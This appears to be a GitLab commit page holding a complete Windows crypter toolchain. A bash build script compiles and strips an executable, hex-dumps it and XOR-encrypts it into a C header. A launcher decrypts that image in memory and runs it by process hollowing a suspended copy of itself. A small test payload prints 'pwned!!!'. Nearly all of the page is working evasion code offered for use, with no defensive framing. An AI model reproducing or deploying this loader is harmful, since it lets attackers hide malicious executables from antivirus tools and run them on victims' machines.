Commit 370d1bea authored by brucewayne's avatar brucewayne

move to batcloud

parent 39cae724
Pipeline #12 failed with stages
#!/bin/bash
type=$1
executable=$2
filename=$3
finalexename=$4
if [ $# != 4 ]; then
echo -e "Usage:\n"
echo -e "$0 <type> <executable> <filename> <exeneame>\n"
echo -e "type \t- [exe] or [source] code"
echo -e "executable\t- locating of source code, must be single file"
echo -e "filename\t- filename of compiled source code"
echo -e "exeneame\t- name of final packed file\n"
exit
fi
if [ $type == "source" ]; then
#do compile
echo "compiling $executable..."
i686-w64-mingw32-gcc $executable -o $filename -static
echo "compiled to $filename"
filesize=`wc -c $filename | grep -Eo '[0-9]' | xargs echo -n | sed 's/ //g'`
echo "file size is $filesize bytes"
echo "stripping..."
strip $filename
new_filesize=`wc -c $filename | grep -Eo '[0-9]' | xargs echo -n | sed 's/ //g'`
echo "new file size is $new_filesize bytes"
fi;
#extract bytes
echo "extracting bytes..."
extract_area/bin2hex --i $filename --o extract_area/raw_bytes > /dev/null
rm pe_image.h
touch pe_image.h
cat extract_area/raw_bytes | ./extract_area/encrypt.py --count >> pe_image.h
echo -e "unsigned long long image_crypt[] = {" >> pe_image.h
cat extract_area/raw_bytes | ./extract_area/encrypt.py >> pe_image.h
echo -e "\n};" >> pe_image.h
echo "wrote bytes"
#compile launcher
#rm $filename
i686-w64-mingw32-g++ exec_memory.cpp main.cpp -o $finalexename -static
#include <windows.h>
#include <iostream>
SECURITY_ATTRIBUTES secAttrib;
using namespace std;
void RunFromMemory(char*, char*);
void RunFromMemory(char* pImage,char* pPath)
{
DWORD dwWritten = 0;
DWORD dwHeader = 0;
DWORD dwImageSize = 0;
DWORD dwSectionCount = 0;
DWORD dwSectionSize = 0;
DWORD firstSection = 0;
DWORD previousProtection = 0;
DWORD jmpSize = 0;
IMAGE_NT_HEADERS INH;
IMAGE_DOS_HEADER IDH;
IMAGE_SECTION_HEADER Sections[1000];
PROCESS_INFORMATION peProcessInformation;
STARTUPINFO peStartUpInformation;
CONTEXT pContext;
char* pMemory;
char* pFile;
memcpy(&IDH,pImage,sizeof(IDH));
memcpy(&INH,(void*)((DWORD)pImage+IDH.e_lfanew),sizeof(INH));
dwImageSize = INH.OptionalHeader.SizeOfImage;
pMemory = (char*)malloc(dwImageSize);
memset(pMemory,0,dwImageSize);
pFile = pMemory;
dwHeader = INH.OptionalHeader.SizeOfHeaders;
firstSection = (DWORD)(((DWORD)pImage+IDH.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
memcpy(Sections,(char*)(firstSection),sizeof(IMAGE_SECTION_HEADER)*INH.FileHeader.NumberOfSections);
memcpy(pFile,pImage,dwHeader);
if((INH.OptionalHeader.SizeOfHeaders % INH.OptionalHeader.SectionAlignment)==0)
{
jmpSize = INH.OptionalHeader.SizeOfHeaders;
}
else
{
jmpSize = INH.OptionalHeader.SizeOfHeaders / INH.OptionalHeader.SectionAlignment;
jmpSize += 1;
jmpSize *= INH.OptionalHeader.SectionAlignment;
}
pFile = (char*)((DWORD)pFile + jmpSize);
for(dwSectionCount = 0; dwSectionCount < INH.FileHeader.NumberOfSections; dwSectionCount++)
{
jmpSize = 0;
dwSectionSize = Sections[dwSectionCount].SizeOfRawData;
memcpy(pFile,(char*)(pImage + Sections[dwSectionCount].PointerToRawData),dwSectionSize);
if((Sections[dwSectionCount].Misc.VirtualSize % INH.OptionalHeader.SectionAlignment)==0)
{
jmpSize = Sections[dwSectionCount].Misc.VirtualSize;
}
else
{
jmpSize = Sections[dwSectionCount].Misc.VirtualSize / INH.OptionalHeader.SectionAlignment;
jmpSize += 1;
jmpSize *= INH.OptionalHeader.SectionAlignment;
}
pFile = (char*)((DWORD)pFile + jmpSize);
}
memset(&peStartUpInformation,0,sizeof(STARTUPINFO));
memset(&peProcessInformation,0,sizeof(PROCESS_INFORMATION));
memset(&pContext,0,sizeof(CONTEXT));
peStartUpInformation.cb = sizeof(peStartUpInformation);
if(CreateProcess(NULL,pPath,&secAttrib,NULL,false,CREATE_SUSPENDED,NULL,NULL,&peStartUpInformation,&peProcessInformation))
{
pContext.ContextFlags = CONTEXT_FULL;
GetThreadContext(peProcessInformation.hThread,&pContext);
VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,PAGE_EXECUTE_READWRITE,&previousProtection);
WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),pMemory,dwImageSize,&dwWritten);
WriteProcessMemory(peProcessInformation.hProcess,(void*)((DWORD)pContext.Ebx + 8),&INH.OptionalHeader.ImageBase,4,&dwWritten);
pContext.Eax = INH.OptionalHeader.ImageBase + INH.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(peProcessInformation.hThread,&pContext);
VirtualProtectEx(peProcessInformation.hProcess,(void*)((DWORD)INH.OptionalHeader.ImageBase),dwImageSize,previousProtection,0);
ResumeThread(peProcessInformation.hThread);
}
free(pMemory);
}
/** \file
\brief Binary to hex converter
\author Tomasz Ostrowski, ot at epf dot pl
\date October 2006
*/
#include <stdio.h>
#include <stdlib.h>
#include <getopt.h>
/** Flag set by `--verbose'. */
static int verbose_flag;
char fin[255]; ///< input filename
char fout[255]; ///< output filename
char strtmp[255]; ///< temporary string
char separator[255]; ///< separator for output strings
int bytes_per_string; ///< how many bytes convert to string? (byte/word/quad/... data)
unsigned int wrap_line; ///< wrap line after about N chars
/** \brief Print some help */
void help(char *exename)
{
puts("\nBinary to hex string (C-like) converter");
printf("\nUsage: %s --i <input_filename> --o <output_filename>\n", exename);
puts(" i.e. bin2hex --i myfile.dat --o myfile.c");
puts("Other options:");
puts(" --s <separator> select separator for output string (i.e. comma or comma+space)");
puts(" --b <bytes_per_string> read byte (default), word, int (0xAB/0xABCD/0x89ABCDEF)");
puts(" --w <wrap_line> wrap line after specified number of chars (default: 70)");
puts(" multi-bytes values treated as little endian");
puts("\nauthor: Tomasz Ostrowski, ot at epf dot pl");
puts("created: 2006.10.23\n");
}
/** \brief Init default options (if not exist in command line) */
void init_options(void)
{
strcpy(fin,"");
strcpy(fout,"hex_out.c");
strcpy(separator, ", "); //default separator
bytes_per_string = 1; //read bytes (not words or ints) from file
wrap_line = 70;
}
int
main (argc, argv)
int argc;
char **argv;
{
int c;
int i;
unsigned int chars_in_line=0; ///< number of chars in current line
int stringlength; ///< length of single converted string
long lSize; ///< filesize
unsigned char *buffer; ///< pointer to buffer for input file
int option_count=0; ///< command-line options counter
FILE *fileIn, *fileOut; ///< input and output file
init_options();
while (1)
{
static struct option long_options[] =
{
/* Flag-type options */
{"verbose", no_argument, &verbose_flag, 1
},
/* Non-flag options distinguished by their indices. */
{"add", no_argument, 0, 'a'
},
{"bytes_per_string", required_argument, 0, 'b'
},
{"in", required_argument, 0, 'i'
},
{"out", required_argument, 0, 'o'
},
{"separator", required_argument, 0, 's'
},
{"wrap_line", required_argument, 0, 'w'
},
{0, 0, 0, 0
}
};
/* getopt_long stores the option index here. */
int option_index = 0;
c = getopt_long (argc, argv, "abc:d:f:",
long_options, &option_index);
/* Detect the end of the options. */
if (c == -1)
{
if(option_count<1)
help(argv[0]); // print help if no arguments
break;
}
option_count++;
switch (c)
{
case 0:
/* If this option set a flag, do nothing else now. */
if (long_options[option_index].flag != 0)
break;
printf ("option %s", long_options[option_index].name);
if (optarg)
printf (" with arg %s", optarg);
printf ("\n");
break;
case 'a':
puts ("option -a\n");
break;
case 'b':
printf ("option -b with value `%s'\n", optarg);
bytes_per_string = atoi(optarg);
if(bytes_per_string<1 || bytes_per_string>10)
{
puts("Required 0<bytes_per_string<=10");
exit(1);
}
break;
case 'c':
printf ("option -c with value `%s'\n", optarg);
break;
case 'i':
printf ("option -i with value `%s'\n", optarg);
strcpy(fin, optarg);
break;
case 'o':
printf ("option -o with value `%s'\n", optarg);
strcpy(fout, optarg);
break;
case 's':
printf ("option -s with value `%s'\n", optarg);
strcpy(separator, optarg);
break;
case '?':
/* getopt_long already printed an error message. */
help(argv[0]);
break;
default:
abort ();
}
}
if (verbose_flag)
puts ("verbose flag is set");
/* Print any remaining command line arguments (not options). */
if (optind < argc)
{
printf ("non-option ARGV-elements: ");
while (optind < argc)
printf ("%s ", argv[optind++]);
putchar ('\n');
}
// start processing
fileIn = fopen(fin, "rb"); // open input file (binary)
if (fileIn==NULL)
{
puts("Error opening input file");
exit (1);
}
// open output file
fileOut = fopen(fout, "wt");
if (fileOut==NULL)
{
puts("Error opening output file for write");
exit (1);
}
// obtain file size.
fseek (fileIn , 0 , SEEK_END);
lSize = ftell (fileIn);
rewind (fileIn);
printf("Filesize: %d bytes.\n", lSize);
if(lSize%bytes_per_string)
{
puts("Error: length of file isn't multiplication of bytes_per_string value.");
puts("Please modify input file or select other formatting");
exit (3);
}
// allocate memory to contain the whole file.
buffer = (unsigned char*) malloc (lSize);
if (buffer == NULL)
{
puts("malloc for input file buffer failed (not enough memory?)");
exit (2);
}
// copy the file into the buffer.
fread (buffer,1,lSize,fileIn);
switch(bytes_per_string)
{
case 1:
stringlength = 4 + strlen(separator); //length of single converted string
for(i=0; i<lSize-1; i++)
{
fprintf(fileOut,"0x%02X%s",buffer[i],separator);
chars_in_line += stringlength;
if(chars_in_line >= wrap_line)
{
fprintf(fileOut, "\n");
chars_in_line = 0;
}
}
fprintf(fileOut,"0x%02X",buffer[i]); //no separator after last string
break;
case 2:
stringlength = 6 + strlen(separator);
for(i=0; i<lSize-2; i+=2)
{
fprintf(fileOut,"0x%04X%s",(unsigned int)(buffer[i]*256 +
buffer[i+1]), separator);
chars_in_line += stringlength;
if(chars_in_line >= wrap_line)
{
fprintf(fileOut, "\n");
chars_in_line = 0;
}
}
fprintf(fileOut,"0x%04X",(unsigned int)(buffer[i]*256 +
buffer[i+1]));
break;
case 4:
stringlength = 10 + strlen(separator);
for(i=0; i<lSize-4; i+=4)
{
fprintf(fileOut,"0x%08X%s",(unsigned int)(buffer[i]*16777216 +
buffer[i+1]*65536 + buffer[i+2]*256 +
buffer[i+3]), separator);
chars_in_line += stringlength;
if(chars_in_line >= wrap_line)
{
fprintf(fileOut, "\n");
chars_in_line = 0;
}
}
fprintf(fileOut,"0x%08X",(unsigned int)(buffer[i]*16777216 +
buffer[i+1]*65536 + buffer[i+2]*256 +
buffer[i+3]));
break;
default:
puts("Sorry, processing for this bytes_per_string value not implemented yet");
}
printf("%d strings printed to file\n", i/bytes_per_string+1);
if(fileIn) fclose (fileIn);
if(fileOut) fclose (fileOut);
if(buffer) free (buffer);
exit (0);
}
#!/usr/bin/env python3
import sys
try:
if sys.argv[1] == "--count":
data = sys.stdin.read()
count = 0
for byte in data.split():
count += 1
print("#define array_len {}\n".format(count))
exit()
except IndexError:
pass
bytes = ""
key = 0x8274058120583047
data = sys.stdin.read()
count = 0
for byte in data.split():
byte = byte.replace(',', "")
if int(byte, 16) != 0x00:
crypt_byte = int(byte, 16) ^ key
else:
crypt_byte = 0x3a11739dafdda332
if count == 16:
bytes += "{},\n".format(hex(crypt_byte))
count = 0
else:
bytes += "{}, ".format(hex(crypt_byte))
count += 1
bytes = bytes.strip()
if bytes[len(bytes)-1] == ',':
bytes = bytes[:len(bytes)-1]
print(bytes)
./bin2hex --i $1 --o raw_bytes
cat raw_bytes | xclip -selection c
echo "copyed to clipboard"
This diff is collapsed.
#include <windows.h>
#include <stdio.h>
#include "main.h"
#include "pe_image.h"
#define key 0x8274058120583047
//unsigned int key;
//signed long long crypt_key = 31339244358205416;
int main(){
int i, x;
char exec_file_path[1024];
unsigned char decrypted_bytes[array_len+1] = {};
/*
for (x = 21+2; x != 0; x--) {
key -= x ^ crypt_key;
printf("%d\n", key);
}
key -= 0xdeadc0de;
printf("%d\n", key);
for (x = 23; x != 0; x--) {
key += crypt_key - x ^ crypt_key;
printf("%d\n", key);
}
*/
for (i = 0; i < array_len; i++) {
if (image_crypt[i] == 0x3a11739dafdda332) {
//printf("%s\n", "image_crypt[i] = 0x00");
decrypted_bytes[i] = 0x00;
image_crypt[i] = '\0';
} else if (image_crypt[i] != 0x3a11739dafdda332) {
//printf("%s %x\n", "image_crypt[i] =", key ^ image_crypt[i]);
decrypted_bytes[i] = key ^ image_crypt[i];
image_crypt[i] = '\0';
}
}
system("pause");
GetModuleFileNameA(0, exec_file_path, 1024); // Path to current executable.
RunFromMemory((char*)decrypted_bytes, exec_file_path);
return 0;
}
void RunFromMemory(char* pImage, char* pPath);
File added
#include <windows.h>
#include <stdio.h>
int main(int argc, char const *argv[]) {
system("powershell /c ls");
printf("%s\n", "pwned!!!");
system("pause");
return 0;
}
This source diff could not be displayed because it is too large. You can view the blob instead.
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment